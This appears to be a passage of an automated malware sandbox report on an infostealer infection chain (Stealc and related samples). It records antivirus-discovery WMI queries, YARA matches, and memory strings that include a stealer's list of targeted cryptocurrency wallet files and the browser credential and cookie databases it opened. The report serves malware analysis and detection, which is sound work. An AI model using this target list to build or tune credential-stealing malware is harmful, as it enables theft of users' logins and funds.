                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe VolumeInformation
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004079F4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,13_2_004079F4
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeCode function: 16_2_0019B010 GetUserNameA,16_2_0019B010
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeCode function: 16_2_001D2307 _free,_free,_free,GetTimeZoneInformation,_free,16_2_001D2307
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeCode function: 16_2_00197C40 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,16_2_00197C40
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                  Source: gold.exe, 00000007.00000002.2695073102.0000000000A84000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 0000001B.00000002.2912782673.0000000000C62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
                                  Source: axplong.exe, 00000006.00000003.2999105107.0000000001671000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3054813558.0000000001671000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.0000000001671000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3054813558.0000000001620000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3140584868.000000000167D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.2999421029.0000000001677000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.0000000001620000.00000004.00000020.00020000.00000000.sdmp, gold.exe, 00000007.00000002.2695073102.0000000000A84000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 0000001B.00000002.2912782673.0000000000C62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVP.exe
                                  Source: RegAsm.exe, 00000009.00000002.2958183657.000000000675C000.00000004.00000020.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.3001121682.00000000069C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                                  Stealing of Sensitive Information

                                  barindex
                                  Source: Yara matchFile source: 2.2.axplong.exe.6d0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 16.0.Nework.exe.190000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 18.0.Hkbsse.exe.210000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 17.2.Hkbsse.exe.210000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 17.0.Hkbsse.exe.210000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.2.file.exe.d70000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 16.2.Nework.exe.190000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 18.2.Hkbsse.exe.210000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 3.2.axplong.exe.6d0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000003.00000002.2137528658.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000011.00000000.2765127201.0000000000211000.00000020.00000001.01000000.00000011.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000006.00000003.2660197463.0000000005270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000002.2100199009.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000003.2059876359.00000000051F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000002.00000003.2092244359.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000012.00000000.2770476347.0000000000211000.00000020.00000001.01000000.00000011.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000012.00000002.3331845995.0000000000211000.00000020.00000001.01000000.00000011.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000003.00000003.2097277338.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000002.00000002.2132657383.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000010.00000000.2751757055.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000011.00000002.2769327231.0000000000211000.00000020.00000001.01000000.00000011.sdmp, type: MEMORY
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Nework[1].exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe, type: DROPPED
                                  Source: Yara matchFile source: 00000016.00000002.2960319681.0000000003119000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: stealc_default2.exe PID: 528, type: MEMORYSTR
                                  Source: Yara matchFile source: 24.0.penis.exe.ca0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000018.00000000.2860928710.0000000000CA2000.00000002.00000001.01000000.00000019.sdmp, type: MEMORY
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\penis[1].exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, type: DROPPED
                                  Source: Yara matchFile source: dump.pcap, type: PCAP
                                  Source: Yara matchFile source: 7.2.gold.exe.37a5570.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 15.0.hjhTHr6fWy.exe.980000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 7.2.gold.exe.37a5570.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 13.2.RegAsm.exe.436080.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 13.2.RegAsm.exe.436080.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 27.2.crypted.exe.39e5570.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 35.0.newbundle2.exe.c20000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 13.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 13.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000007.00000002.2695505270.00000000037A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000009.00000002.2858375876.0000000000421000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000023.00000000.2951592112.0000000000C41000.00000002.00000001.01000000.00000022.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000001B.00000002.2955093646.0000000003A05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000001F.00000002.3088502787.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000F.00000000.2743413238.0000000000982000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: gold.exe PID: 2972, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5580, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1712, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: hjhTHr6fWy.exe PID: 1856, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: penis.exe PID: 7152, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: crypted.exe PID: 2956, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6472, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\newbundle2[1].exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe, type: DROPPED
                                  Source: Yara matchFile source: 00000017.00000002.3340691563.000000000279D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: fidovideorecorder32_64.exe PID: 3288, type: MEMORYSTR
                                  Source: Yara matchFile source: 19.0.stealc_default2.exe.f50000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 22.2.needmoney.exe.30ea4b9.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 22.2.needmoney.exe.3740000.2.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 22.2.needmoney.exe.3710000.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 22.2.needmoney.exe.3710000.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 22.2.needmoney.exe.30ea4b9.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 22.2.needmoney.exe.3740000.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 19.2.stealc_default2.exe.f50000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000020.00000002.3006538986.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000013.00000002.2994583849.000000000079E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000013.00000000.2774274390.0000000000F51000.00000080.00000001.01000000.00000012.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000013.00000002.2996521135.0000000000F51000.00000080.00000001.01000000.00000012.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000016.00000002.2972396756.0000000003740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000016.00000002.2971489446.0000000003710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: stealc_default2.exe PID: 528, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\stealc_default2[1].exe, type: DROPPED
                                  Source: Yara matchFile source: dump.pcap, type: PCAP
                                  Source: Yara matchFile source: Process Memory Space: stealc_default2.exe PID: 528, type: MEMORYSTR
                                  Source: Yara matchFile source: 37.2.InstallUtil.exe.800000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 36.2.rstxdhuj.exe.4141590.4.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 36.2.rstxdhuj.exe.418fdb0.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000024.00000002.3118723302.0000000004141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000025.00000002.3332091327.0000000000802000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000024.00000002.3009810672.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 24.0.penis.exe.ca0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\penis[1].exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, type: DROPPED
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectrumE#
                                  Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\\ElectronCash\wallets\\*.*
                                  Source: hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002F1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $]q2C:\Users\user\AppData\Roaming\Electrum\wallets\*
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: JaxxE#
                                  Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\\window-state.json
                                  Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\\exodus.conf.jsonFD
                                  Source: hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002F1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.walletLR]q$>
                                  Source: stealc_default2.exe, 00000013.00000002.2994583849.000000000079E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\info.seco
                                  Source: stealc_default2.exe, 00000013.00000002.3044045737.00000000271A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                  Source: stealc_default2.exe, 00000013.00000002.2996721656.0000000000FBA000.00000004.00000001.01000000.00000012.sdmpString found in binary or memory: \jaxx\Local Storage\
                                  Source: stealc_default2.exe, 00000013.00000002.3044045737.00000000271A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\passphrase.json
                                  Source: hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002F1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum\walletsLR]q
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ExodusE#
                                  Source: hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002F1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $]q%appdata%`,]qdC:\Users\user\AppData\Roaming`,]qdC:\Users\user\AppData\Roaming\Binance
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: EthereumE#
                                  Source: stealc_default2.exe, 00000013.00000002.2996721656.0000000000FBA000.00000004.00000001.01000000.00000012.sdmpString found in binary or memory: file__0.localstorage
                                  Source: hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002F1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $]q&%localappdata%\Coinomi\Coinomi\walletsLR]q
                                  Source: hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002F1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $]q6C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                                  Source: stealc_default2.exe, 00000013.00000002.2996721656.0000000000FBA000.00000004.00000001.01000000.00000012.sdmpString found in binary or memory: MultiDoge
                                  Source: stealc_default2.exe, 00000013.00000002.2994583849.000000000079E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\seed.seco
                                  Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\\Ethereum\\keystore
                                  Source: stealc_default2.exe, 00000013.00000002.2994583849.000000000079E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\*.*L
                                  Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\\Electrum-LTC\wallets\\*.*
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
